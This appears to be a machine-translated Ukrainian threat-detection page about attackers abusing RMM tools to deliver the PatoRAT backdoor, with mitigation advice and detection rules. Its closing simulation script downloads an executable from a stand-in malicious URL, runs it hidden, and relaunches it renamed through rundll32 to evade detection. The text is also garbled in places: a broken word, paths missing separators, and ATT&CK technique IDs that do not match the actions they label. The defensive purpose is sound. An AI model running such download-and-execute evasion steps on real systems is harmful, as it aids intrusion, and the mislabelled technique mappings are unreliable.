Виявлення Endpoint у недавніх випадках поширення RMM
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Актори загроз дедалі частіше зловживають легітимними інструментами віддаленого моніторингу та управління (RMM)—такими як LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne та SuperOps—для розповсюдження шкідливих програм і встановлення стійкого віддаленого доступу. Початкова доставка часто відбувається через зловмисні сторінки завантажень або фішингові електронні листи, після чого йде виконання через PowerShell і розгортання вторинних корисних навантажень, таких як бекдор PatoRAT. AhnLab EDR може виявити виконання цих утиліт RMM і генерувати оповіщення на основі поведінки підозрілої подальшої діяльності. Звіт підкреслює важливість перевірки походження програмного забезпечення та підтримки безперервного моніторингу кінцевих точок.
Розслідування
Центр безпеки AhnLab спостерігав кілька кампаній, у яких зловмисники перепаковували або маскували інсталятори RMM під популярні додатки (наприклад, Notepad++, 7-Zip і Telegram) і доставляли їх через зловмисні сайти або фішингові вкладення. Після встановлення агенти RMM реєструвалися у їхній інфраструктурі постачальника та далі використовувалися для виконання корисних навантажень PowerShell, які встановлювали PatoRAT. Подібна тактика спостерігалася у кількох продуктах RMM, включаючи Syncro, що постачалася через фішинг з PDF-приманками. Логіка виявлення AhnLab EDR була розроблена для позначення виконання цих, на перший погляд, легітимних бінарних файлів і кореляції їх з поведінкою після установки.
Пом’якшення
Перевірте джерела завантажень, підтвердіть сертифікати підпису коду та порівняйте хеші з офіційними релізами постачальника перед дозволом використання програмного забезпечення RMM у середовищі. Застосуйте списки дозволених застосунків та вимагайте явних дозволів для виконання RMM. Слідкуйте за несподіваними запусками бінарних файлів RMM, аномальною активністю PowerShell та підозрілими з’єднаннями з доменами інфраструктури постачальника, коли такі інструменти не санкціоновані. Оновлюйте операційні системи та засоби безпеки, щоб зменшити вплив.
Відповідь
Коли виявлено підозрюване виконання RMM, ізолюйте хост, зберіть судово-експертні артефакти та видаліть несанкціонований бінарний файл. Блокуйте вихідні з’єднання з інфраструктурою інструмента, щоб відсікати канали віддаленого управління, і проведіть повне сканування на наявність вторинних корисних навантажень, таких як PatoRAT. Оновіть контент для виявлення з виявленими IOC та повідомте SOC про паттерни кампанії для швидшого реагування.
Потік атак
Виявлення
Альтернативне програмне забезпечення віддаленого доступу / управління (через process_creation)
Перегляд
Можлива спроба встановлення програмного забезпечення SuperOps RMM (через file_event)
Перегляд
Альтернативне програмне забезпечення віддаленого доступу / управління (через audit)
Перегляд
Альтернативне програмне забезпечення віддаленого доступу / управління (через system)
Перегляд
Виявлення експлуатації інструменту RMM для розповсюдження шкідливого ПЗ [Windows Process Creation]
Перегляд
Виконання симуляції
Обов’язкова умова: Перевірка телеметрії та базового рівня повинна бути успішною.
Обґрунтування: Цей розділ детально описує точне виконання тактики супротивника (TTP), розроблене для запуску правила виявлення. Команди й наратив МАЮТЬ безпосередньо відображати виявлені TTP і націлені на створення точного телеметрії, яку очікує логіка виявлення. Абстрактні або непо ilarated приклади призведуть до неправильної діагностики.
-
Сценарій атаки та команди:
Атакуючий надсилає фішинговий електронний лист, що містить зловмисне вкладення. Вкладення виконує сценарій PowerShell, який завантажує бінарний файл RMMLogMeIn.exetoC:Temp. Щоб уникнути виявлення на основі імені, атакуючий перейменовує бінарний файл уtool.exeі запускає його черезrundll32.exe(T1216). Бінарний файл RMM потім контактує з сервером C2 під контролем атакуючого і викидає бекдорне навантаження. Після виконання атакуючий видаляє бінарний файл (T1542.004), щоб приховати сліди. -
Скрипт регресійного тестування:
# --------------------------------------------------------------- # Симулювати експлуатацію інструменту RMM (оригінальне ім'я) – повинен викликати тригер # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Виконання оригінального бінарного файлу RMM (очікувано оповіщення)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Симулювати ухилення шляхом перейменування та проксі-виконання – НЕ повинен викликати тригер # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Виконання перейменованого бінарного файлу RMM через rundll32 (ухилення)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Очищення артефактів # --------------------------------------------------------------- Write-Host "[*] Очищення бінарних файлів..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Симуляція завершена." -
Команди очищення:
# Переконайтеся, що всі залишкові процеси завершено Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Видалити всі завантажені файли (якщо вони все ще є) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue